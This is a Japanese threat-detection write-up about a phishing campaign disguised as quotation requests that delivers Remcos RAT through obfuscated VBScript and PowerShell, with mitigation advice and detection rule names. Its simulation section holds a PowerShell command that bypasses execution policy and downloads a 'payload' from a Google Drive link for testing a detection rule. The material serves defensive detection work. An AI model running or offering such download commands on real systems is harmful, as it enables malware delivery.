偽の見積もり依頼メールを使用したマルウェアフィッシング攻撃
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
脅威アクターは、プロジェクト見積もり依頼を装ったフィッシングメールを配信し、悪意のあるペイロードを配信しています。このキャンペーンはVBScriptを使用してPowerShellコマンドを隠し、最終的には多段ペイロードとRemcos RATを取得します。最終的なマルウェアはリモートコマンドの実行、キーロギング、侵害されたシステムからのデータ流出をサポートします。
調査
AhnLab セキュリティ インテリジェンスセンター (ASEC) は、圧縮アーカイブに隠されたVBScriptsを含むフィッシングキャンペーンを特定しました。研究者たちは、notepad.exeを濫用して’powershell’実行可能名を再構築し、トークンベースの文字列置換に依存するPowerShellコマンドの難読化方法を発見しました。この多段ペイロードは、UACバイパスを実行するためにCOMオブジェクトも利用します。
緩和策
ユーザーは送信者のメールドメインを検証し、予期しない添付ファイルやハイパーリンクを開く際に注意を払うべきです。組織は、.vbs、.exe、.jsのような疑わしいファイル拡張子をブロックするようにメールフィルタリングを設定するべきです。ユーザーは、送信者が不明のメールで受け取った非公式または疑わしいURLにて機密資格情報を入力しないようにする必要があります。
対応
悪意のある活動が検出された場合、元のメールの正当性を確認し、%APPDATA%内で疑わしいファイル活動を調査してください。許可されていないPowerShellの実行とRemcos RATに関連する指標を確認します。追加のC2通信や横方向の活動、データ流出を防ぐために、侵害されたシステムをネットワークから隔離してください。
攻撃の流れ
この部分はまだ更新中です。
検出
LOLBAS WScript / CScript(プロセス作成経由)
データ流入/流出/第三者サービス/ツールによるC2の可能性(dns_query経由)
データ流入/流出/第三者サービス/ツールによるC2の可能性(dns経由)
検出するためのIOC(HashMd5):見積もり依頼を装ったフィッシングメールに注意してください
検出するためのIOC(SourceIP):見積もり依頼を装ったフィッシングメールに注意してください
検出するためのIOC(DestinationIP):見積もり依頼を装ったフィッシングメールに注意してください
C2サーバーに接続するPowerShellスクリプトの検出 [Windows ネットワーク接続]
VBScript難読化を介した悪意のあるPowerShellの実行 [Windows Powershell]
シミュレーション実行
-
攻撃のシナリオとコマンド: 攻撃者は、文書へのリンクを含むスピアフィッシングメールを送信します。ユーザーがリンクをクリックすると、Google Driveリポジトリから悪意のあるスクリプトを引き出すように設計された隠しPowerShellコマンドが実行されます。攻撃者は
export=downloadパラメーターを使用して、ファイルをブラウザで表示せずに直接ダウンロードすることを保証します。目的は、ディスクベースのアンチウイルスを回避するためにメモリ内でのファイルレスペイロードの実行です。このコマンドは、このダウンロードパターンを狙った特定の検出ルールをトリガするように作成されています。 -
リグレッションテストスクリプト:
# Google Drive経由の特定URLパターンを使用したファイルダウンロードのPowerShell シミュレーション $targetUrl = "https://drive.google.com/uc?export=download&id=1A2B3C4D5E6F7G8H9I0J" Start-Process powershell.exe -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"Write-Host 'Downloading payload...'; $data = Invoke-WebRequest -Uri '$targetUrl';`"" -
クリーンアップコマンド:
# この特定のシミュレーションではディスクにファイルは書き込まれませんが、 # まだ実行中の場合はプロセスを停止します。 Stop-Process -Name "powershell" -ErrorAction SilentlyContinue